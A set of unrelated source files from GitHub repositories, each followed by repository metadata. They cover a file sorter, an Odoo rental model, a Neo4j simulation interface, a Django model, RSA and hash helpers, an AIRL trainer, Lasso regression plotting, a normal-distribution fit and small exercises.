# ✔ Каждая группа включает файлы с несколькими расширениями.
# ✔ В исходной папке должны остаться только те файлы,
# которые не подошли для сортировки
from string import ascii_lowercase, digits
from random import choices, randint
from os import path
import os
def check_dir(dir, **kwargs) -> None:
if not path.exists(dir):
os.mkdir(dir)
os.chdir(dir)
make_exp(**kwargs)
def make_files(exp: str, min_name_len: int = 6, max_name_len: int = 30,
min_size: int = 256, max_size: int = 4096, amount: int = 42) -> None:
for _ in range(amount):
name = ''.join(choices(ascii_lowercase + digits + '_', k=randint(min_name_len, max_name_len)))
data = bytes(randint(0, 255) for _ in range(randint(min_size, max_size)))
with open(rf'{name}.{exp}', mode='wb') as rnd_files:
rnd_files.write(data)
def make_exp(**kwargs):
for exp, amount in kwargs.items():
make_files(exp=exp, amount=amount)
def sort_files_by_directories():
for file in os.listdir():
extention = file.split('.')[-1]
if not os.path.exists(extention):
if extention in 'py':
continue
else:
os.mkdir(extention)
os.replace(file, os.path.join(os.getcwd(), extention, file))
make_exp(mp3=3, avi=2, txt=1)
sort_files_by_directories() | e6ton1set/specialization | python/homework/homework_7/home_1.py | home_1.py | py | 1,670 | python | ru | code | 0 | github-code | 13 |
32729168269 | import datetime
import dateutil
from odoo import _, models
class Product(models.Model):
_inherit = "product.product"
def can_rent(self, start_date, stop_date, qty=None):
return self.env["website.rentals.scheduling"].can_rent(
self, start_date, stop_date, qty=qty
)
def get_available_rental_qty(self, start_date, stop_date):
return self.env["website.rentals.scheduling"].get_available_qty(
self, start_date, stop_date
)
def get_rental_hourly_timeslots(self, date=None):
"""
Generates a set of timeslots for a certain time period based on this
products rental pricing rules.
The smallest interval, hourly pricing rule is used. For example, if a
product has three rules for 1 hour, 2 hour, and 3 hours, then this is
going to generate hourly time slots.
"""
now = datetime.datetime.now()
date = dateutil.parser.parse(date).replace(tzinfo=None)
if not self.rental_pricing_ids:
return
if "hour" not in self.mapped("rental_pricing_ids.unit"):
return
# Find the lowest duration "hour" pricing rule
price_rule = self.env["rental.pricing"].search(
[
("id", "in", self.rental_pricing_ids.ids),
("unit", "=", "hour")
],
order="duration asc",
limit=1,
)
# Break up the day into segements of `interval size`. If the smallest
# pricing rule is 2 hours, then this will divy up the day into the slots
# 2:00, 4:00, 6:00.
timeslots = []
current_timeslot = datetime.datetime(
year=date.year,
month=date.month,
day=date.day,
hour=0,
minute=0,
second=0
)
if price_rule.start_time:
current_timeslot = current_timeslot.replace(
hour=price_rule.start_time_hour,
minute=price_rule.start_time_minutes,
)
if price_rule.end_time:
date = date.replace(
hour=price_rule.end_time_hour,
minute=price_rule.end_time_minutes
)
while True:
if current_timeslot > now:
timeslots.append(current_timeslot.strftime("%H:%M"))
current_timeslot += datetime.timedelta(hours=price_rule.duration)
if current_timeslot > date:
break
return timeslots
| ScopeaFrance/rental-1 | website_rentals/models/product.py | product.py | py | 2,535 | python | en | code | null | github-code | 13 |
40783571731 | def perception(tx, agent):
"""
Provides the local environment for the given agent
:param tx: write transaction for neo4j database
:param agent: id number for agent
:return: Node the agent is located at followed by the outgoing edges of that node and those edges end nodes.
"""
results = tx.run("MATCH (m:Agent)-[s:LOCATED]->(n:Node) "
"WITH n, m "
"WHERE m.id={agent} "
"MATCH (n)-[r:REACHES]->(a) "
"RETURN n, r, a", agent=agent).values()
if results:
node = results[0][0]
edges = [edge[1] for edge in results]
results = [node] + edges
return results
def locateagent(tx, agent):
"""
Finds which node the given agent is currently located at.
:param tx: read or write transaction for neo4j database
:param agent: agent id number
:return: Node the agent is currently located at
"""
results = tx.run("MATCH (m:Agent)-[s:LOCATED]->(n:Node) "
"WHERE m.id={agent} "
"RETURN n", agent=agent).values()
return results[0][0]
def updatecontactedge(tx, node_a, node_b, attribute, value, label_a=None, label_b=None):
"""
Update a value on a SOCIAL edge based on the nodes at each end.
:param tx: write transaction for neo4j database
:param node_a: id of first node
:param node_b: id of second node
:param attribute: attribute to be updated
:param value: new value of attribute
:param label_a: label of first node
:param label_b: label of second node
:return: None
"""
query = "MATCH (a"
if label_a:
query = query + ":" + label_a
query = query + ")-[r:SOCIAL]->(b"
if label_b:
query = query + ":" + label_b
query = query + ") WHERE a.id={node_a} and b.id={node_b} SET r." + attribute + "={value} "
tx.run(query, node_a=node_a, node_b=node_b, value=value)
def deletecontact(tx, node_a, node_b, label_a, label_b, contact_type='SOCIAL'):
"""
Deletes a contact edge in the database.
:param tx: neo4j write transaction
:param node_a: id of source node
:param node_b: id of target node
:param label_a: label of source node
:param label_b: label of target node
:param contact_type: label of relationship
:return: None
"""
query = "MATCH (a:" + label_a + ")-[r"
if contact_type:
query = query + ":" + contact_type
query = query + "]->(b:" + label_b + ") WHERE a.id=" + str(node_a) + " and b.id=" + str(node_b)
query = query + " DELETE r RETURN COUNT(r)"
tx.run(query)
def agentcontacts(tx, node_a, label, contact_label=None):
"""
Returns outgoing contact edges from a node
:param tx: neo4j read or write transaction
:param node_a: source node id
:param label: source node label
:param contact_label: type of out going relationship
:return: relationships and end nodes
"""
if contact_label:
contact_label = ": " + contact_label
else:
contact_label = ": " + label
results = tx.run("MATCH (a:" + label + ")-[r:SOCIAL]->(b" + contact_label + ") "
"WHERE a.id={node_a} "
"RETURN r, b", node_a=node_a).values()
return [res[0] for res in results]
def colocated(tx, agent):
"""
Find agents at the same physical node as the given agent
:param tx: neo4j read or write transaction
:param agent: agent id
:return: List of co-located agents
"""
results = tx.run("MATCH (m:Agent)-[s:LOCATED]->(n:Node) "
"WITH n "
"WHERE m.id={agent} "
"MATCH (a:Agent)-[s:LOCATED]->(n:Node) "
"RETURN a", agent=agent).values()
results = [res[0] for res in results]
return results
def getnode(tx, nodeid, label=None, uid=None):
"""
Returns the details of a given node
:param tx: neo4j read or write transaction
:param nodeid: id for wanted node
:param label: node label
:param uid: type of id
:return: Node object
"""
if not uid:
uid = "id"
if label == "Agent":
query = "MATCH (n:Agent) ""WHERE n." + uid + " = {id} ""RETURN n"
results = tx.run(query, id=nodeid, lab=label).values()
elif label:
query = "MATCH (n:" + label + ") ""WHERE n." + uid + " = {id} ""RETURN n"
results = tx.run(query, id=nodeid).values()
else:
query = "MATCH (n) ""WHERE n." + uid + " = {id} ""RETURN n"
results = tx.run(query, id=nodeid).values()
node = results[0][0]
return node
def getnodeagents(tx, nodeid, uid="name"):
"""
Finds all agents currently located at a node
:param tx: neo4j read or write transaction
:param nodeid: id of node
:param uid: type of id node uses
:return: List of agents at node
"""
query = "MATCH (a)-[r:LOCATED]->(n) ""WHERE n." + uid + " ={id} ""RETURN a"
results = tx.run(query, id=nodeid).values()
results = [res[0] for res in results]
return results
def getnodevalue(tx, node, value, label=None, uid=None):
"""
Retrieves a particular value from a node
:param tx: neo4j read or write transaction
:param node: id of the node
:param value: attribute to return
:param label: label of the node
:param uid: type of id used
:return: value of attribute asked for
"""
if not uid:
uid = "id"
if label:
query = "MATCH (a:" + label + ") ""WHERE a." + uid + "=" + str(node) + " ""RETURN a." + value
else:
query = "MATCH (a:Node) ""WHERE a." + uid + "=" + str(node) + " ""RETURN a." + value
results = tx.run(query, node=node).value()
return results[0]
def getrunname(tx):
"""
Retrieve the label formed for this run, saved in node in database
:param tx: neo4j read or write transaction
:return: run name string
"""
query = "MATCH (a:Tag) ""RETURN a.tag"
return tx.run(query).value()[0]
def gettime(tx):
"""
Retrieves the current time on the database clock
:param tx: neo4j read or write transaction
:return: Current time on clock
"""
query = "MATCH (a:Clock) ""RETURN a.time"
return tx.run(query).value()[0]
def tick(tx):
"""
Increment the clock in the database
:param tx: neo4j write transaction
:return: New time
"""
time = 1 + gettime(tx)
query = "MATCH (a:Clock) ""SET a.time={time} "
return tx.run(query, time=time)
def shortestpath(tx, node_a, node_b, node_label, edge_label, directed=False):
"""
Returns the length of the shortest path between two nodes
:param tx: neo4j read or write transaction
:param node_a: first node id
:param node_b: second node id
:param node_label: label for both nodes
:param edge_label: label for the type of relationships to use in path
:param directed: whether to consider direction of path in calculations
:return: Length of shortest path between two nodes
"""
if directed:
directionality = 'OUTGOING'
else:
directionality = 'BOTH'
query = "MATCH (a) WHERE a.id=" + str(node_a) + " WITH a MATCH (b) WHERE b.id=" + str(node_b) + " WITH a, b "
query = query + "CALL algo.shortestPath(a, b,null, {relationshipQuery:'" + edge_label
query = query + "', direction: '" + directionality + "'}) YIELD totalCost RETURN totalCost"
sp = tx.run(query).values()[0]
return sp[0]
def updateedge(tx, edge, attr, value, uid=None):
"""
Modify an attribute of an edge
:param tx: neo4j write transaction
:param edge: relationship object
:param attr: attribute to modify
:param value: new value of attribute
:param uid: type of id used in system
:return: None
"""
if not uid:
uid = "id"
start = edge.start_node
end = edge.end_node
query = "MATCH (a:Node)-[r:REACHES]->(b:Node) ""WHERE a." + uid + "={start} AND b." + uid + \
"={end} ""SET r." + attr + "={val}"
tx.run(query, start=start[uid], end=end[uid], val=value)
def updatenode(tx, node, attr, value, uid=None, label=None):
"""
Update attribute of a node
:param tx: neo4j write transaction
:param node: node id
:param attr: attribute to be updated
:param value: new value for the attribute
:param uid: type of id being used
:param label: lable of node
:return: None
"""
if not uid:
uid = "id"
if not label:
label = "Node"
query = "MATCH (a:" + label + ") ""WHERE a." + uid + "={node} ""SET a." + attr + "={value}"
tx.run(query, node=node, value=value)
def updateagent(tx, node, attr, value, uid=None):
"""
Update and agents attribute value.
:param tx: neo4j write transaction
:param node: node id
:param attr: attribute to be updated
:param value: new value of attribute
:param uid: type of id used
:return: None
"""
if not uid:
uid = "id"
query = "MATCH (a:Agent) ""WHERE a." + uid + "={node} ""SET a." + attr + "={value}"
tx.run(query, node=node, value=value)
def deleteagent(tx, agent, uid=None):
"""
Delete an agent and it's location in database
:param tx: neo4j write transaction
:param agent: agent id
:param uid: type of id used
:return: None
"""
if not uid:
uid = "id"
tx.run("MATCH (n:Agent)-[r:LOCATED]->() ""WHERE n." + uid + "={ID} ""DELETE r", ID=agent[uid])
tx.run("MATCH (n:Agent) ""WHERE n." + uid + "={ID} ""DELETE n", ID=agent[uid])
def addagent(tx, node, label, params, uid=None):
"""
Insert a new agent into the system
:param tx: neo4j write transaction
:param node: node to locate agent at
:param label: label of node
:param params: list of parameters of agent
:param uid: type of id used by node
:return: None
"""
if not uid:
uid = "id"
query = "MATCH (n: " + label + ") ""WITH n ""ORDER BY n.id DESC ""RETURN n.id"
highest_id = tx.run(query).values()
if highest_id:
agent_id = highest_id[0][0] + 1
else:
agent_id = 0
query = "CREATE (a:" + label + " {id:" + str(agent_id)
for param in params:
query = query + ", " + param + ":" + str(params[param])
query = query + "})-[r:LOCATED]->(n)"
tx.run("MATCH (n:Node) ""WHERE n." + uid + "= '" + node[uid] + "' " + query)
def createedge(tx, node_a, node_b, label_a, label_b, edge_label, parameters=None):
"""
Adds and edge between to nodes with attributes and label as given
:param tx: neo4j write transaction
:param node_a: source node id
:param node_b: target node id
:param label_a: source node label
:param label_b: target node label
:param edge_label: label of new edge
:param parameters: parameters of new edge
:return: None
"""
query = "MATCH (a:" + label_a + ") WHERE a.id=" + str(node_a) + " WITH a MATCH (b:" + label_b + ") " \
"WHERE b.id=" + str(
node_b) + " " \
"WITH a, b " \
"CREATE (a)-[n:" + edge_label
if parameters:
query = query + " {" + str(parameters) + "}"
query = query + "]->(b) "
tx.run(query)
| faulknerrainford/SPmodelling | SPmodelling/Interface.py | Interface.py | py | 11,458 | python | en | code | 0 | github-code | 13 |
24388798956 | # -*- coding: utf-8 -*-
from django.db import models
class Exam(models.Model):
class Meta(object):
verbose_name = u"Іспит"
verbose_name_plural = u"Іспити"
title = models.CharField(
max_length=256,
blank=False,
verbose_name=u"Назва предмету")
datetime = models.DateField(
blank=False,
verbose_name=u"Дата та час проведення",
null=True)
teatcher_name = models.CharField(
max_length=256,
verbose_name=u"Імя викладача",
blank=True,
null=True)
group = models.ForeignKey('Group',
verbose_name=u"Група",
blank=True,
null=True)
def __unicode__(self):
return u"%s" % (self.title)
| anna777/new-work | students/models/exams.py | exams.py | py | 757 | python | uk | code | 0 | github-code | 13 |
5619410036 | from auto_server import settings
import hashlib
import rsa
import base64
def gen_key(time):
s = '{}|{}'.format(settings.KEY, time)
md5 = hashlib.md5()
md5.update(s.encode('utf-8'))
return md5.hexdigest()
def decrypt(value):
key_str = base64.standard_b64decode(settings.PRIV_KEY)
pk = rsa.PrivateKey.load_pkcs1(key_str)
val_list = []
for i in range(0, len(value), settings.RSA_LENGTH):
v = value[i:i + settings.RSA_LENGTH]
val = rsa.decrypt(v, pk)
val_list.append(val)
return b''.join(val_list)
| wkiii/CMDB-oldboy | auto_server/utils/security.py | security.py | py | 584 | python | en | code | 0 | github-code | 13 |
2250494489 | """Adversarial Inverse Reinforcement Learning (AIRL)."""
from typing import Optional
import torch as th
from stable_baselines3.common import base_class, policies, vec_env
from stable_baselines3.sac import policies as sac_policies
from imitation.algorithms import base
from imitation.algorithms.adversarial import common
from imitation.rewards import reward_nets
STOCHASTIC_POLICIES = (sac_policies.SACPolicy, policies.ActorCriticPolicy)
class AIRL(common.AdversarialTrainer):
"""Adversarial Inverse Reinforcement Learning (`AIRL`_).
.. _AIRL: https://arxiv.org/abs/1710.11248
"""
def __init__(
self,
*,
demonstrations: base.AnyTransitions,
demo_batch_size: int,
venv: vec_env.VecEnv,
gen_algo: base_class.BaseAlgorithm,
reward_net: reward_nets.RewardNet,
**kwargs,
):
"""Builds an AIRL trainer.
Args:
demonstrations: Demonstrations from an expert (optional). Transitions
expressed directly as a `types.TransitionsMinimal` object, a sequence
of trajectories, or an iterable of transition batches (mappings from
keywords to arrays containing observations, etc).
demo_batch_size: The number of samples in each batch of expert data. The
discriminator batch size is twice this number because each discriminator
batch contains a generator sample for every expert sample.
venv: The vectorized environment to train in.
gen_algo: The generator RL algorithm that is trained to maximize
discriminator confusion. Environment and logger will be set to
`venv` and `custom_logger`.
reward_net: Reward network; used as part of AIRL discriminator.
**kwargs: Passed through to `AdversarialTrainer.__init__`.
Raises:
TypeError: If `gen_algo.policy` does not have an `evaluate_actions`
attribute (present in `ActorCriticPolicy`), needed to compute
log-probability of actions.
"""
super().__init__(
demonstrations=demonstrations,
demo_batch_size=demo_batch_size,
venv=venv,
gen_algo=gen_algo,
reward_net=reward_net,
**kwargs,
)
# AIRL needs a policy from STOCHASTIC_POLICIES to compute discriminator output.
if not isinstance(self.gen_algo.policy, STOCHASTIC_POLICIES):
raise TypeError(
"AIRL needs a stochastic policy to compute the discriminator output.",
)
def logits_expert_is_high(
self,
state: th.Tensor,
action: th.Tensor,
next_state: th.Tensor,
done: th.Tensor,
log_policy_act_prob: Optional[th.Tensor] = None,
) -> th.Tensor:
r"""Compute the discriminator's logits for each state-action sample.
In Fu's AIRL paper (https://arxiv.org/pdf/1710.11248.pdf), the
discriminator output was given as
.. math::
D_{\theta}(s,a) =
\frac{ \exp{r_{\theta}(s,a)} } { \exp{r_{\theta}(s,a)} + \pi(a|s) }
with a high value corresponding to the expert and a low value corresponding to
the generator.
In other words, the discriminator output is the probability that the action is
taken by the expert rather than the generator.
The logit of the above is given as
.. math::
\operatorname{logit}(D_{\theta}(s,a)) = r_{\theta}(s,a) - \log{ \pi(a|s) }
which is what is returned by this function.
Args:
state: The state of the environment at the time of the action.
action: The action taken by the expert or generator.
next_state: The state of the environment after the action.
done: whether a `terminal state` (as defined under the MDP of the task) has
been reached.
log_policy_act_prob: The log probability of the action taken by the
generator, :math:`\log{ \pi(a|s) }`.
Returns:
The logits of the discriminator for each state-action sample.
Raises:
TypeError: If `log_policy_act_prob` is None.
"""
if log_policy_act_prob is None:
raise TypeError(
"Non-None `log_policy_act_prob` is required for this method.",
)
reward_output_train = self._reward_net(state, action, next_state, done)
return reward_output_train - log_policy_act_prob
@property
def reward_train(self) -> reward_nets.RewardNet:
return self._reward_net
@property
def reward_test(self) -> reward_nets.RewardNet:
"""Returns the unshaped version of reward network used for testing."""
reward_net = self._reward_net
# Recursively return the base network of the wrapped reward net
while isinstance(reward_net, reward_nets.RewardNetWrapper):
reward_net = reward_net.base
return reward_net
| HumanCompatibleAI/imitation | src/imitation/algorithms/adversarial/airl.py | airl.py | py | 5,092 | python | en | code | 1,004 | github-code | 13 |
8235553584 | import pandas as pd
from funciones import sql
def indicadores(semestres):
"""
Test.
"""
columnas = [
'orden', 'escuela_id', 'escuela', 'semestre', 'proceso',
# 'orden', 'departamento_id', 'departamento', 'semestre', 'proceso',
'a_tiempo', 'fuera_tiempo', 'total', 'fecha_inicio', 'fecha_fin'
]
muchos_dataframe = []
for semestre in semestres:
query = f'''EXEC sga.kw_indicadores_cronograma_cumplimiento_escuelas '{semestre}' '''
# query = f'''EXEC sga.kw_indicadores_cronograma_cumplimiento_departamento '{semestre}' '''
consulta = sql.extraer_datos(query)
dataframe = pd.DataFrame(consulta, columns=columnas)
muchos_dataframe.append(dataframe)
# dataframe.to_excel(f'./data/{semestre}.xlsx', index=False)
# print(f'Archivo {semestre}.xlsx creado.')
guardar_resultados = pd.concat(muchos_dataframe)
guardar_resultados.to_excel('./data/escuela_indicadores.xlsx', index=False)
return 'Archivos creados.'
def egresados(semestre):
"""
Test de obtencion de datos de egresados.
"""
query = f''' EXEC kw_escuela_egresados '01','09','{semestre}' '''
with sql.obtener_cursor() as cursor:
cursor.execute(query)
column_names = [column[0] for column in cursor.description]
consulta = cursor.fetchall()
dataframe = pd.DataFrame(consulta, columns=column_names)
dataframe['semestre'] = semestre
return dataframe
SEMESTRES = [
'2017-1', '2017-2', '2018-1', '2018-2', '2019-1', '2019-2',
'2020-1', '2020-2', '2021-1', '2021-2', '2022-1', '2022-2'
]
# INDICADOR = indicadores(SEMESTRES)
# print(INDICADOR)
dataframes = list(map(egresados, SEMESTRES))
save_result = pd.concat(dataframes)
save_result.to_excel('./data/egresados_civil.xlsx', index=False)
print('Finish!')
| LeninElio/moodle_api | data_test.py | data_test.py | py | 1,852 | python | es | code | 0 | github-code | 13 |
73155932816 | # -*- coding: utf-8 -*-
"""
Created on Mon Jun 14 13:01:03 2021
@author: danaukes
"""
import glob
import os
import argparse
from pdf2image import convert_from_path, convert_from_bytes
from pdf2image.exceptions import (
PDFInfoNotInstalledError,
PDFPageCountError,
PDFSyntaxError
)
def extract(path):
pdfs = glob.glob(path)
for pdf in pdfs:
folder,file = os.path.split(pdf)
file_root,dummy = os.path.splitext(file)
images = convert_from_path(pdf)
if len(images)==1:
index_string = ''
else:
index_string = '_{0:03.0f}'
for ii,image in enumerate(images):
# i = images[0]
factor = 3000/image.width
if factor<1:
image = image.resize((int(factor*image.width),int(factor*image.height)))
image.save(os.path.join(folder,'{0}{1}.png'.format(file_root,index_string.format(ii))),'png')
if __name__=='__main__':
parser = argparse.ArgumentParser()
parser.add_argument('path',metavar='path',type=str,help='path', default = None,nargs='+')
args = parser.parse_args()
paths = [os.path.normpath(os.path.expanduser(item)) for item in args.path]
for path in paths:
extract(path)
| danb0b/code_media_tools | python/media_tools/pdf_tools/pdf_to_png.py | pdf_to_png.py | py | 1,284 | python | en | code | 0 | github-code | 13 |
28475560036 | from collections import defaultdict
import math
def find(arr, option = 2):
arr.sort(key = lambda x : int(x[2]))
# print(arr)
uniqueVisitors = dict()
visits = dict()
allVisitors = defaultdict(set)
Time = dict()
highestTimeSpent = dict()
entryVisit = dict()
highVisit = dict()
roomNumbers = set()
highVisitorsTime = dict()
for roomNumber, visitorNumber, time in arr:
# if (roomNumber == '6'):
# print(visitorNumber, time)
roomNumbers.add(roomNumber)
if visitorNumber not in allVisitors[roomNumber]:
uniqueVisitors[roomNumber] = 1 + uniqueVisitors.get(roomNumber, 0)
allVisitors[roomNumber].add(visitorNumber)
if (roomNumber, visitorNumber) not in entryVisit:
entryVisit[(roomNumber, visitorNumber)] = time
else:
entryTime = entryVisit[(roomNumber, visitorNumber)]
timeSpent = int(time) - int(entryTime)
Time[roomNumber] = timeSpent + Time.get(roomNumber, 0)
visits[roomNumber] = 1 + visits.get(roomNumber, 0)
highVisitorsTime[(roomNumber, visitorNumber)] = timeSpent + highVisitorsTime.get((roomNumber, visitorNumber), 0)
highestVisitTime = highVisit.get(roomNumber, 0)
currVisitorTime = highVisitorsTime[(roomNumber, visitorNumber)]
if currVisitorTime > highestVisitTime:
highVisit[roomNumber] = currVisitorTime
del entryVisit[(roomNumber, visitorNumber)]
res = []
for i in roomNumbers:
currRoomNumber = i
currUniqueVisitors = uniqueVisitors[currRoomNumber]
timeSpentTotal = Time[currRoomNumber]
totalVisits = visits[currRoomNumber]
currAverage = round(timeSpentTotal / totalVisits)
currhighestVisitTime = highVisit[currRoomNumber]
# print(highVisit[currRoomNumber])
if option == 0 :
res.append((currRoomNumber, currUniqueVisitors))
elif option == 1 :
res.append((currRoomNumber, currUniqueVisitors, currAverage))
elif option == 2:
res.append((currRoomNumber, currUniqueVisitors, currAverage, currhighestVisitTime))
res.sort(key = lambda x : int(x[0]))
print(res)
test_case = [('15', '3', '61'), ('15', '3', '45'), ('6', '0', '91'), ('10', '4', '76'), ('6', '0', '86'), ('6', '4', '2'), ('10', '1', '47'), ('6', '3', '17'), ('6', '4', '41'), ('15', '3', '36'), ('6', '2', '97'), ('15', '4', '58'), ('6', '0', '16'), ('10', '2', '21'), ('10', '4', '75'), ('6', '0', '76'), ('15', '4', '50'), ('10', '1', '64'), ('6', '3', '3'), ('15', '3', '35'), ('6', '2', '96'), ('10', '2', '35'), ('10', '2', '77'), ('10', '2', '48')]
find(test_case, 2) | therealharish/Full-Stack-Open | Python Answers/5th.py | 5th.py | py | 2,735 | python | en | code | 0 | github-code | 13 |
47190419964 | from diffop_experiments import MNISTRotModule
def process_dataset(module):
module.setup("fit")
loader = module.train_dataloader()
# See https://discuss.pytorch.org/t/about-normalization-using-pre-trained-vgg16-networks/23560/6
mean = 0.
std = 0.
nb_samples = 0.
for data, _ in loader:
batch_samples = data.size(0)
data = data.view(batch_samples, data.size(1), -1)
mean += data.mean(2).sum(0)
std += data.std(2).sum(0)
nb_samples += batch_samples
mean /= nb_samples
std /= nb_samples
print("Mean:", mean.item())
print("Std:", std.item())
if __name__ == "__main__":
process_dataset(MNISTRotModule(batch_size=128, validation_size=0, normalize=False, upsample=False, pad=False))
# To check whether the normalization is implemented correctly, you can instead comment out these lines
# Mean should be close to 0 and std close to 1
# process_dataset(MNISTRotModule(batch_size=128, validation_size=0, normalize=True, upsample=False, pad=False)) | ejnnr/steerable_pdo_experiments | calculate_dataset_stats.py | calculate_dataset_stats.py | py | 1,043 | python | en | code | 0 | github-code | 13 |
72943533458 | wagons = int(input())
trains = [0]*wagons
command = input()
while not command == "End":
data = command.split()
if data[0] == 'add':
people = int(data[1])
trains[-1] += people
if data[0] == 'insert':
index = int(data[1])
people = int(data[2])
trains[index] += people
if data[0] == 'leave':
index = int(data[1])
people = int(data[2])
trains[index] -= people
command = input()
print(trains)
| Andon-ov/Python-Fundamentals | 13_lists_advanced_lab/02_trains.py | 02_trains.py | py | 479 | python | en | code | 0 | github-code | 13 |
39575732053 | # cook your dish here
for _ in range(int(input())):
N, X, Y = list(map(int, input().split()))
S = input()
zeros = S.count('0')
ones = S.count('1')
if ones > 0 and zeros > 0:
if X > Y:
print(Y)
else:
print(X)
else:
print(0)
| KillerStrike17/CP-Journey | Codechef/Starters/Starters 32/BSCOST.py | BSCOST.py | py | 296 | python | en | code | 0 | github-code | 13 |
16345290072 | """user tokens
Revision ID: bb5ed0594ba7
Revises: 3ec18dbfc7ff
Create Date: 2018-06-13 21:54:36.866578
"""
from alembic import op
import sqlalchemy as sa
# revision identifiers, used by Alembic.
revision = 'bb5ed0594ba7'
down_revision = '3ec18dbfc7ff'
branch_labels = None
depends_on = None
def upgrade():
# ### commands auto generated by Alembic - please adjust! ###
op.create_index(op.f('ix_garden_address'), 'garden', ['address'], unique=False)
op.create_index(op.f('ix_garden_lat'), 'garden', ['lat'], unique=False)
op.create_index(op.f('ix_garden_lon'), 'garden', ['lon'], unique=False)
op.add_column('user', sa.Column('token', sa.String(length=32), nullable=True))
op.add_column('user', sa.Column('token_expiration', sa.DateTime(), nullable=True))
op.create_index(op.f('ix_user_token'), 'user', ['token'], unique=True)
# ### end Alembic commands ###
def downgrade():
# ### commands auto generated by Alembic - please adjust! ###
op.drop_index(op.f('ix_user_token'), table_name='user')
op.drop_column('user', 'token_expiration')
op.drop_column('user', 'token')
op.drop_index(op.f('ix_garden_lon'), table_name='garden')
op.drop_index(op.f('ix_garden_lat'), table_name='garden')
op.drop_index(op.f('ix_garden_address'), table_name='garden')
# ### end Alembic commands ###
| grbarker/GardenApp | migrations/versions/bb5ed0594ba7_user_tokens.py | bb5ed0594ba7_user_tokens.py | py | 1,347 | python | en | code | 0 | github-code | 13 |
37190237266 | """
File: extension.py
------------------
This is a file for creating an optional extension program, if
you'd like to do so.
"""
import random
MIN_ANSWER = 1
MAX_ANSWER = 20
def main():
while question() != "":
create_random_answer()
def question():
ask = input("Ask a yes or no question: ")
return ask
def create_random_answer():
num = random.randint(MIN_ANSWER, MAX_ANSWER)
check(num)
def check(value):
if value == 1:
print("As I see it, yes.")
elif value == 2:
print("Ask again later.")
elif value == 3:
print("Better not tell you now.")
elif value == 4:
print("Cannot predict now.")
elif value == 5:
print("Concentrate and ask again.")
elif value == 6:
print("Don’t count on it.")
elif value == 7:
print("It is certain.")
elif value == 8:
print("It is decidedly so.")
elif value == 9:
print("Most likely.")
elif value == 10:
print("My reply is no.")
elif value == 11:
print("My sources say no.")
elif value == 12:
print("Outlook not so good.")
elif value == 13:
print("Outlook good.")
elif value == 14:
print("Reply hazy, try again.")
elif value == 15:
print("Signs point to yes.")
elif value == 16:
print("Very doubtful.")
elif value == 17:
print("Without a doubt.")
elif value == 18:
print("Yes.")
elif value == 19:
print("Yes – definitely.")
else:
print("You may rely on it")
# This provided line is required at the end of a Python file
# to call the main() function.
if __name__ == '__main__':
main() | moura-pedro/CS106A | assignment02/8ball.py | 8ball.py | py | 1,689 | python | en | code | 0 | github-code | 13 |
7158477497 | '''Crie um programa que leia um numero inteiro e
mostre na tela se ele e par ou impar.
r1 (amarelo)
r2 (azul)
r3 (laranja)
'''
num = int(input('Digite um numero: '))
resultado = num % 2
if resultado == 0:
print('O numero {} e PAR'.format(num))
else:
print('O numero {} e IMPAR'.format(num)) | maxrscarvalho/Python---Curso-em-video---Professor-Guanabara | Modulo_1/Desafio_030.py | Desafio_030.py | py | 306 | python | pt | code | 0 | github-code | 13 |
12229756958 | import numpy as np
import pandas as pd
from sklearn.linear_model import Lasso
from sklearn.metrics import r2_score
from sklearn.model_selection import train_test_split
import matplotlib
matplotlib.use('Agg')
import matplotlib.pyplot as plt
from joblib import dump
def plotting(income,lim,rating,cards,r2):
fig = plt.figure()
axes = fig.add_subplot(211)
ax = fig.add_subplot(212, sharex=axes)
plotrange= range(0, 10000,50)
axes.plot(plotrange, rating, color='b', label="Rating")
axes.plot(plotrange, lim, color='y',label="Limit")
axes.plot(plotrange, income, color='g',label="Income")
axes.plot(plotrange, cards, color='r',label="Cards")
axes.set_ylabel('Value of the coefficient')
axes.set_xlim(0.1,10000)
axes.set_ylim(-10,10)
axes.set_xscale('log')
ax.set_xlabel("alpha")
ax.set_ylabel('R^2')
ax.plot(plotrange, r2)
axes.legend(loc = "lower left")
plt.savefig("plot.pdf", dpi=300, bbox_inches='tight')
def alpha_param(x,y):
r2 = []
income = []
lim = []
rating = []
cards = []
x_train,x_test,y_train,y_test = train_test_split(x[["Income", "Cards", "Rating","Limit"]],y, shuffle=True,test_size=0.2)
for i in range(0, 10000, 50):
model = Lasso(alpha = i,fit_intercept = True)
#print(x_train)
model.fit(x_train, y_train)
y_pred = model.predict(x_test)
print(model.coef_)
income.append( model.coef_[0])
cards.append(model.coef_[1])
rating.append(model.coef_[2])
lim.append(model.coef_[3])
r2.append(r2_score( y_test, y_pred ))
if(i==100):
dump(model, f'model_1.joblib')
elif(i==2000):
dump(model, f'model_2.joblib')
elif(i==5000):
dump(model, f'model_3.joblib')
return income,lim,rating,cards,r2
if __name__ == "__main__":
cred = pd.read_csv("__files/credit.csv", index_col=False, sep=',')
X = cred.drop(['Unnamed: 0','Age','Education','Gender','Student','Married','Ethnicity','Balance'],axis= 1)
#print(X)
inc, lim, rat, car, r2 = alpha_param(X, cred["Balance"])
plotting(inc,lim,rat,car,r2) | chaitanya1chawla/Practicum_Python_for_AI_ML | chapter_8/ex1_lasso/main.py | main.py | py | 2,237 | python | en | code | 0 | github-code | 13 |
14511721612 | from scipy.stats import norm
'''
Given 0 < alpha < 1 and quantiles q_0 < q1 returns mean and std. deviation of normal distribution
X ~ Normal(mu, sigma) such that P(q_0 < X < q_1) = alpha
mu: since normal distribution is symmetric, mu is midway between q_0 and q_1
sigma: X = mu + sigma*Z ~ N(mu, sigma) (Z ~ N(0,1))
P( -(q_1 - q_0)/(2*sigma) < Z < (q_1 - q_0)/(2*sigma) ) = alpha
https://docs.scipy.org/doc/scipy/reference/generated/scipy.stats.rv_continuous.html#scipy.stats.rv_continuous
sf(x) = 1 - F(x)
isf = sf^-1
y in [0,1], y = sf( isf( y ) ) = 1 - F( isf(y) )
F( isf(y) ) = 1 - y
F( isf(1-y) ) = y
'''
def fit_norm( alpha, q_0, q_1 ):
mu = (q_0 + q_1)*0.5
u = norm.isf( 0.5*(1-alpha) )
sigma = (q_1 - q_0)/(2*u)
return mu, sigma
| leeds-indoor-air/QMRA | helper_functions/fit_normal_to_quantiles.py | fit_normal_to_quantiles.py | py | 785 | python | en | code | 0 | github-code | 13 |
42929190864 | # 데이터과학 group 2
# 데이터 정제 (load file and make word2idx)
from __future__ import unicode_literals, print_function, division
from io import open
import unicodedata
import string
import re
import random
import torch
import torch.nn as nn
from torch import optim
import torch.nn.functional as F
from hparams import hparams
# start token, end token 지정
SOS_token = 0
